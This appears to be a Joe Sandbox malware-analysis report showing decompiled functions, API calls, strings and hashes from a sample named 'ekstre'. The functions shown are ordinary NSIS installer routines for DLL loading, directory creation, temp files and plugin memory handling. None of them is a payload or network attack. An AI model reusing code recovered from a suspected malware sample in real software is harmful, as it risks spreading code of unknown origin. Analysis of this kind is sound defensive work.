Opcode ID: 3f5a9690675092f22fb810837e33e53015671863e040307b19d291e7def74cfe
Instruction ID: 63e60ac67b4e883fe7bd24bdd2c574d132039877e9348bdd5c077dae5ce07507
Opcode Fuzzy Hash: 3f5a9690675092f22fb810837e33e53015671863e040307b19d291e7def74cfe
Instruction Fuzzy Hash: 9D515B71900209ABDF10CFA5D984B9F7BA8AF44756F14417AEC11B72C0DB389F51CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004065D2 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004065D2(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}

0x004065e9
0x004065f2
0x004065f4
0x004065f4
0x004065f8
0x0040660a
0x00406604
0x00406604
0x00406604
0x0040660e
0x00406622
0x00406636
0x0040663d

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004065E9
wsprintfA.USER32 ref: 00406622
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406636

Strings

\, xrefs: 004065FA
%s%s.dll, xrefs: 0040661C
UXTHEME, xrefs: 004065DB

Memory Dump Source

Source File: 00000000.00000002.1117513142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1117477265.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117579894.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1119767205.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
Instruction ID: 76c47868d5e75c0d477681ee613e4a8fc51d539333552aabfef4ea70f2838048
Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
Instruction Fuzzy Hash: 98F0F63055020A6BEB149B68ED0DFEB365CAB08304F1404BEA586E20C1EAB9D9258B69

Uniqueness

Uniqueness Score: -1.00%

Function 6DE81F58 Relevance: 9.1, APIs: 6, Instructions: 134
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E6DE81F58(void* _a4) {
				signed int _v4;
				signed int _v8;
				signed int _t46;
				void* _t47;
				signed int _t48;
				void* _t49;
				void* _t52;
				void* _t56;
				signed int _t57;
				signed int _t59;
				void* _t60;

				_t52 = _a4;
				_t46 = 0 |  *((intOrPtr*)(_t52 + 0x814)) > 0x00000000;
				while(1) {
					_v8 = _t46;
					_t59 = _t46 << 5;
					_t60 =  *(_t59 + _t52 + 0x830);
					if(_t60 == 0 || _t60 == 0x1a) {
						goto L8;
					}
					if(_t60 != 0xffffffff) {
						_t51 = _t60 - 1;
						if(_t60 - 1 > 0x18) {
							 *(_t59 + _t52 + 0x830) = 0x1a;
							L11:
							_t56 = _t59 + _t52;
							if( *((intOrPtr*)(_t59 + _t52 + 0x81c)) >= 0) {
							}
							_t48 =  *(_t59 + _t52 + 0x818) & 0x000000ff;
							 *(_t59 + _t52 + 0x834) =  *(_t59 + _t52 + 0x834) & 0x00000000;
							_v4 = _t48;
							if(_t48 > 7) {
								L28:
								_t49 = GlobalFree(_t60); // executed
								_t57 = _v8;
								if(_t57 == 0) {
									return _t49;
								}
								_t43 = _t57 + 1; // 0x2
								_t55 =  !=  ? _t43 : 0;
								_t46 =  !=  ? _t43 : 0;
								continue;
							} else {
								switch( *((intOrPtr*)(_t48 * 4 +  &M6DE82108))) {
									case 0:
										 *(_t56 + 0x820) =  *(_t56 + 0x820) & 0x00000000;
										goto L28;
									case 1:
										_push(__esi);
										__eax = E6DE81326();
										_pop(__ecx);
										goto L18;
									case 2:
										_push(__esi);
										__eax = E6DE81326();
										_pop(__ecx);
										 *__ebp = __eax;
										_a4 = __edx;
										goto L28;
									case 3:
										__eax = E6DE812AF(__esi);
										goto L21;
									case 4:
										 *0x6de85040 =  *0x6de85040 +  *0x6de85040;
										__eax = GlobalAlloc(0x40,  *0x6de85040 +  *0x6de85040);
										__ecx =  *0x6de85040;
										_a4 = __eax;
										__eax = MultiByteToWideChar(0, 0, __esi,  *0x6de85040, __eax,  *0x6de85040);
										if(_v4 != 5) {
											__eax = _a4;
											L21:
											 *(__edi + __ebx + 0x834) = __eax;
											L18:
											 *__ebp = __eax;
											goto L28;
										}
										__eax = GlobalAlloc(0x40, 0x10);
										 *(__edi + __ebx + 0x834) = __eax;
										__edi = _a4;
										_push(__eax);
										_push(__edi);
										 *__ebp = __eax;
										__imp__CLSIDFromString();
										__eax = GlobalFree(__edi);
										goto L28;
									case 5:
										if( *__esi != 0) {
											_push(__esi);
											__eax = E6DE81326();
											 *(__edi + __ebx + 0x820) = __eax;
										}
										goto L28;
									case 6:
										 *(__edi + __ebx + 0x830) =  *(__edi + __ebx + 0x830) - 1;
										__ecx = ( *(__edi + __ebx + 0x830) - 1) *  *0x6de85040;
										__ecx = ( *(__edi + __ebx + 0x830) - 1) *  *0x6de85040 +  *0x6de85038;
										_push(__ecx);
										__eax = __ecx + 0xc;
										 *(__edx + 0x820) = __eax;
										asm("cdq");
										_push(__edx);
										_push(__eax);
										__eax = E6DE8144D(__ecx);
										__esp = __esp + 0xc;
										goto L28;
								}
							}
						}
						_t47 = E6DE814E2(_t51);
						L9:
						L10:
						_t60 = _t47;
						goto L11;
					}
					_t47 = E6DE8152B();
					goto L10;
					L8:
					_t47 = E6DE812AF(0x6de840c7);
					goto L9;
				}
			}

0x6de81f5b
0x6de81f6a
0x6de81f6d
0x6de81f6f
0x6de81f73
0x6de81f76
0x6de81f7f
0x00000000
0x00000000
0x6de81f89
0x6de81f92
0x6de81f98
0x6de81fa2
0x6de81fbc
0x6de81fc4
0x6de81fc7
0x6de81fc7
0x6de81fd7
0x6de81fdf
0x6de81fe7
0x6de81fee
0x6de820dc
0x6de820dd
0x6de820e3
0x6de820e9
0x6de82106
0x6de82106
0x6de820ed
0x6de820f6
0x6de820f9
0x00000000
0x6de81ff4
0x6de81ff4
0x00000000
0x6de81ffb
0x00000000
0x00000000
0x6de82007
0x6de82008
0x6de8200d
0x00000000
0x00000000
0x6de82016
0x6de82017
0x6de8201c
0x6de8201d
0x6de82020
0x00000000
0x00000000
0x6de82029
0x00000000
0x00000000
0x6de8203d
0x6de82042
0x6de82048
0x6de82056
0x6de8205a
0x6de82065
0x6de82090
0x6de8202f
0x6de8202f
0x6de8200e
0x6de8200e
0x00000000
0x6de8200e
0x6de8206b
0x6de82071
0x6de82078
0x6de8207c
0x6de8207d
0x6de8207e
0x6de82081
0x6de82088
0x00000000
0x00000000
0x6de82099
0x6de8209b
0x6de8209c
0x6de820a9
0x6de820a9
0x00000000
0x00000000
0x6de820b9
0x6de820ba
0x6de820c1
0x6de820c7
0x6de820c8
0x6de820cb
0x6de820d1
0x6de820d2
0x6de820d3
0x6de820d4
0x6de820d9
0x00000000
0x00000000
0x6de81ff4
0x6de81fee
0x6de81f9b
0x6de81fb9
0x6de81fba
0x6de81fba
0x00000000
0x6de81fba
0x6de81f8b
0x00000000
0x6de81faf
0x6de81fb4
0x00000000
0x6de81fb4

APIs

GlobalFree.KERNELBASE(00000000), ref: 6DE820DD

Part of subcall function 6DE812AF: lstrcpynA.KERNEL32(00000000,?,6DE81502,?,6DE811C4,-000000A0), ref: 6DE812BF

GlobalAlloc.KERNEL32(00000040,?), ref: 6DE82042
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 6DE8205A
GlobalAlloc.KERNEL32(00000040,00000010), ref: 6DE8206B
CLSIDFromString.OLE32(00000000,00000000), ref: 6DE82081
GlobalFree.KERNEL32(00000000), ref: 6DE82088

Part of subcall function 6DE81958: VirtualAlloc.KERNEL32(00000000,00000010,00001000,00000040,?,6DE820A7,00000000,?), ref: 6DE8198A

Memory Dump Source

Source File: 00000000.00000002.1181790668.000000006DE81000.00000020.00000001.01000000.00000004.sdmp, Offset: 6DE80000, based on PE: true

Associated: 00000000.00000002.1181679975.000000006DE80000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1181869899.000000006DE84000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1181977025.000000006DE86000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6de80000_ekstre.jbxd

Similarity

API ID: Global$Alloc$Free$ByteCharFromMultiStringVirtualWidelstrcpyn
String ID:
API String ID: 506890080-0
Opcode ID: 6b52d2036d6d95c44c4ed5e4b25f63e2fd70d5df8f66ad9bf21e772fd952cbc4
Instruction ID: 9399ce2fd69647ebb707d0ca7d064ae8dbee34185e3e6734e0bfdb93922f3002
Opcode Fuzzy Hash: 6b52d2036d6d95c44c4ed5e4b25f63e2fd70d5df8f66ad9bf21e772fd952cbc4
Instruction Fuzzy Hash: B641F171409241EFD7129F68D844BAAB7E9FF46305F24822EE95C9A147DF305941CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 0040581B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040581B(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408384;
				_v36.Group = 0x408384;
				_t5 =  &_v36; // 0x4037e5
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor = _t5;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408374;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405826
0x0040582a
0x0040582d
0x00405830
0x00405833
0x00405837
0x0040583b
0x00405843
0x0040584a
0x00405850
0x00405857
0x0040585e
0x00405866
0x00405868
0x00000000
0x00405868
0x00405872
0x00405879
0x0040588f
0x00000000
0x00000000
0x00000000
0x00405891
0x00405895

APIs

CreateDirectoryA.KERNELBASE(?,0000000B,007F9000), ref: 0040585E
GetLastError.KERNEL32 ref: 00405872
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405887
GetLastError.KERNEL32 ref: 00405891

Strings

7@, xrefs: 00405830

Memory Dump Source

Source File: 00000000.00000002.1117513142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1117477265.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117579894.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1119767205.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: 7@
API String ID: 3449924974-48919864
Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
Instruction ID: 776ade97b95de8c7d2b46bb8ae0b91a032d8614f7eaf99ef62f682375182682f
Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
Instruction Fuzzy Hash: CD010872D00219EADF109BA1C944BEFBBB4EF04354F04843AD944B6190DB789658CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00405CB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E00405CB4(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00406234(0x7bad70, _a4);
				_t21 = E00405C5F(0x7bad70);
				if(_t21 != 0) {
					E00406512(_t21);
					if(( *0x7c5f78 & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x7bad70;
						while(1) {
							_t11 = lstrlenA(0x7bad70);
							_push(0x7bad70);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E004065AB();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405C0D(0x7bad70);
								continue;
							} else {
								goto L1;
							}
						}
						E00405BC6();
						_t16 = GetFileAttributesA(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405cc0
0x00405ccb
0x00405ccf
0x00405cd6
0x00405ce2
0x00405cee
0x00405cee
0x00405d06
0x00405d07
0x00405d0e
0x00405d0f
0x00000000
0x00000000
0x00405cf2
0x00405cf9
0x00405d01
0x00000000
0x00000000
0x00000000
0x00000000
0x00405cf9
0x00405d11
0x00405d17
0x00000000
0x00405d25
0x00405ce4
0x00405ce8
0x00000000
0x00000000
0x00000000
0x00000000
0x00405ce8
0x00405cd1
0x00000000

APIs

Part of subcall function 00406234: lstrcpynA.KERNEL32(0000000B,0000000B,00002000,00403533,007C1F60,NSIS Error,?,00000007,00000009,0000000B), ref: 00406241

Part of subcall function 00405C5F: CharNextA.USER32(?,?,C:\,0000000B,00405CCB,C:\,C:\,76E73410,?,007F9000,00405A16,?,76E73410,007F9000,007EF000), ref: 00405C6D
Part of subcall function 00405C5F: CharNextA.USER32(00000000), ref: 00405C72
Part of subcall function 00405C5F: CharNextA.USER32(00000000), ref: 00405C86

lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,76E73410,?,007F9000,00405A16,?,76E73410,007F9000,007EF000), ref: 00405D07
GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,76E73410,?,007F9000,00405A16,?,76E73410,007F9000), ref: 00405D17

Strings

C:\, xrefs: 00405CBA, 00405CBF, 00405CC5, 00405D00, 00405D06, 00405D0E, 00405D16

Memory Dump Source

Source File: 00000000.00000002.1117513142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1117477265.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117579894.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1119767205.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\
API String ID: 3248276644-3404278061
Opcode ID: 640e8f29881e7450eab0cb04f5be9d3b5334d53e2352fca671a70c513fa980b5
Instruction ID: b2f90c104d091caefbdf248ad6eecd547c4a548a9290806d3cb0df0cb8eaf4a6
Opcode Fuzzy Hash: 640e8f29881e7450eab0cb04f5be9d3b5334d53e2352fca671a70c513fa980b5
Instruction Fuzzy Hash: 34F0A421109E5126E62632392D09A9F2A45CE86364719417FF852B12D6DA3C8892E97E

Uniqueness

Uniqueness Score: -1.00%

Function 00405DF6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405DF6(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3d4; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}

0x00405dfa
0x00405e00
0x00405e01
0x00405e01
0x00405e06
0x00405e07
0x00405e0a
0x00405e14
0x00405e21
0x00405e24
0x00405e2c
0x00000000
0x00000000
0x00405e30
0x00000000
0x00000000
0x00405e32
0x00000000
0x00405e32
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405E0A
GetTempFileNameA.KERNELBASE(0000000B,?,00000000,?,?,0040338E,007F7000,007F9000,007F9000,007F9000,007F9000,007F9000,007F9000,0040366D,?,00000007), ref: 00405E24

Strings

nsa, xrefs: 00405E01

Memory Dump Source

Source File: 00000000.00000002.1117513142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1117477265.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117579894.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1119767205.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
Instruction ID: b539df49976acb950e7ba8a000158db73584ae344042610fd92299246841c882
Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
Instruction Fuzzy Hash: 86F0A736304208BBEB108F56ED04B9B7B9CDF91750F10C03BF988DB290D6B5D9548798

Uniqueness

Uniqueness Score: -1.00%

Function 6DE81606 Relevance: 4.6, APIs: 3, Instructions: 123
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E6DE81606(void* __ebx, void* __edx, void* __edi, void* __esi) {
				void* _t37;
				intOrPtr _t43;
				void* _t49;
				void* _t50;
				void* _t51;
				void* _t55;
				void* _t56;
				signed char _t62;
				signed int _t64;
				signed int _t66;
				struct HINSTANCE__* _t71;
				void* _t72;
				void* _t80;
				void* _t84;
				void* _t85;
				void* _t87;

				_t80 = __esi;
				_t72 = __edi;
				_t55 = __ebx;
				 *0x6de85040 =  *((intOrPtr*)(_t87 + 8));
				 *0x6de8503c =  *((intOrPtr*)(_t87 + 0x64));
				 *0x6de85038 =  *((intOrPtr*)(_t87 + 0x60));
				 *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x6c)) + 0xc))( *0x6de85014, E6DE812F7, _t84);
				_push(1);
				_t37 = E6DE82288();
				_t85 = _t37;
				if(_t85 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t85 + 4)) != 1) {
						E6DE81EDD(_t85);
					}
					E6DE81F58(_t85);
					if( *((intOrPtr*)(_t85 + 4)) == 0xffffffff) {
						L14:
						if(( *(_t85 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t85 + 4)) == 0) {
								_t37 = E6DE82128(_t85);
							} else {
								_push(_t55);
								_push(_t80);
								_push(_t72);
								_t64 = 8;
								_t14 = _t85 + 0x818; // 0x818
								_t56 = _t14;
								memcpy(_t87 + 0x14, _t56, _t64 << 2);
								_t43 = E6DE81E71(_t85, _t87 + 0x30);
								 *(_t85 + 0x834) =  *(_t85 + 0x834) & 0x00000000;
								 *((intOrPtr*)(_t85 + 0x820)) = _t43;
								 *_t56 = 3;
								E6DE82128(_t85);
								_t66 = 8;
								_t37 = memcpy(_t56, _t87 + 0x28, _t66 << 2);
							}
						} else {
							E6DE82128(_t85);
							_t37 = GlobalFree(E6DE8157E(E6DE815F4(_t85)));
						}
						if( *((intOrPtr*)(_t85 + 4)) != 1) {
							E6DE81F1F(_t85);
							_t62 =  *(_t85 + 0x810);
							_t37 = _t62;
							if((_t62 & 0x00000040) != 0 &&  *_t85 == 1) {
								_t71 =  *(_t85 + 0x808);
								if(_t71 != 0) {
									FreeLibrary(_t71);
									_t37 =  *(_t85 + 0x810);
								}
							}
							if((_t37 & 0x00000020) != 0) {
								_t37 = E6DE81558( *0x6de8502c);
							}
						}
						if(( *(_t85 + 0x810) & 0x00000002) == 0) {
							_t37 = GlobalFree(_t85); // executed
						}
						goto L28;
					}
					_t49 =  *_t85;
					if(_t49 == 0) {
						if( *((intOrPtr*)(_t85 + 4)) != 1) {
							goto L14;
						}
						E6DE82E4F(_t85);
						L12:
						_t85 = _t49;
						L13:
						goto L14;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						L8:
						_t49 = E6DE82BC4(_t85); // executed
						goto L12;
					}
					_t51 = _t50 - 1;
					if(_t51 == 0) {
						_push(_t85);
						E6DE81774();
						goto L13;
					}
					if(_t51 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x6de81606
0x6de81606
0x6de81606
0x6de8160d
0x6de81616
0x6de81620
0x6de81634
0x6de81637
0x6de81639
0x6de8163e
0x6de81643
0x6de8176f
0x6de81773
0x6de81649
0x6de8164d
0x6de81650
0x6de81655
0x6de81657
0x6de81661
0x6de81699
0x6de816a0
0x6de816c4
0x6de81712
0x6de816c6
0x6de816c6
0x6de816c7
0x6de816c8
0x6de816cb
0x6de816d0
0x6de816d0
0x6de816dd
0x6de816e0
0x6de816e5
0x6de816ed
0x6de816f3
0x6de816f9
0x6de81709
0x6de8170a
0x6de8170e
0x6de816a2
0x6de816a3
0x6de816b8
0x6de816b8
0x6de8171c
0x6de8171f
0x6de81725
0x6de8172b
0x6de81730
0x6de81738
0x6de81740
0x6de81743
0x6de81749
0x6de81749
0x6de81740
0x6de81751
0x6de81759
0x6de8175e
0x6de81751
0x6de81766
0x6de81769
0x6de81769
0x00000000
0x6de81766
0x6de81666
0x6de81669
0x6de8168e
0x00000000
0x00000000
0x6de81691
0x6de81696
0x6de81696
0x6de81698
0x00000000
0x6de81698
0x6de8166b
0x6de8166e
0x6de8167a
0x6de8167b
0x00000000
0x6de8167b
0x6de81670
0x6de81673
0x6de81682
0x6de81683
0x00000000
0x6de81683
0x6de81678
0x00000000
0x00000000
0x00000000
0x6de81678

APIs

Part of subcall function 6DE82288: GlobalFree.KERNEL32(?), ref: 6DE82901
Part of subcall function 6DE82288: GlobalFree.KERNEL32(?), ref: 6DE82907
Part of subcall function 6DE82288: GlobalFree.KERNEL32(?), ref: 6DE8290D

GlobalFree.KERNEL32(00000000), ref: 6DE816B8
FreeLibrary.KERNEL32(?), ref: 6DE81743
GlobalFree.KERNELBASE(00000000), ref: 6DE81769

Part of subcall function 6DE81EDD: GlobalAlloc.KERNEL32(00000040,?), ref: 6DE81F0C

Part of subcall function 6DE81774: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,6DE81688,00000000), ref: 6DE81817

Part of subcall function 6DE81E71: wsprintfA.USER32 ref: 6DE81EA4

Memory Dump Source

Source File: 00000000.00000002.1181790668.000000006DE81000.00000020.00000001.01000000.00000004.sdmp, Offset: 6DE80000, based on PE: true

